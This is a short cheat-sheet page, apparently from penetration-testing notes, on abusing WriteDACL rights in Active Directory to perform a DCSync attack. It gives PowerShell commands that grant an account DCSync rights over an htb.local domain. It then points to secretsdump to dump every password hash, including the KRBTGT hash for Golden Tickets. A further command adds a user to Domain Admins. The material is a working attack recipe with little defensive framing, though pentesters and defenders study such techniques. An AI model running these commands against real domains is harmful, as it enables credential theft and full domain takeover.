WriteDACL over DCSync

DCSync is an attack that allows an adversary to simulate the behavior of a domain controller (DC) and retrieve password data via domain replication. The classic use for DCSync is as a precursor to a Golden Ticket attack, as it can be used to retrieve the KRBTGT hash.

If our group or user has WriteDacl. We can abuse it by running the following commands. We need valid credentials of an account that has the said privilege.

$pass= ConvertTo-SecureString '<our-users-password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('DOMAINNAME\<our-user>', $pass)
Add-DomainObjectAcl  -Credential $cred  -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity <our-user> -Rights DCSync

Then all we need to do is use secretsdump and we should be able to dump all the hashes.

We could also do,

net group "Domain admins" <user> /add /domain

PreviousAccount Operators NextGenericWrite GPO

Last updated 3 years ago